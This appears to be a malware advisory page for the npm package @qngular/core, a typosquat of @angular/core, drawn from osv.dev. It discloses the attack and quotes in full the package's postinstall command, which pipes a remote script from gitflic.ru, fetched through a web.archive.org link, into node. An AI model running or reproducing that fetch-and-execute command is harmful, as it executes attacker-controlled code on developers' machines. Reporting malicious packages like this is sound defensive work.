Logo
npm

@qngular/core@22.2.1

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC

Malicious

OSV ID

MAL-2026-17544

Ecosystem

npm

Summary

Package @qngular/core is a one-character typosquat of @angular/core and copies the real package's description, author, and repository metadata. The postinstall lifecycle script in package.json runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching an opaque, non-publisher-controlled JavaScript payload from a third-party host (gitflic.ru via a web.archive.org proxy) and piping it unverified into node. This executes attacker-controlled code on the installer's machine during npm install.

Source: amazon-inspector (e83437986b94381cddff72267bc53907d980e1b14dbfef9123aa47f5ed664664)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.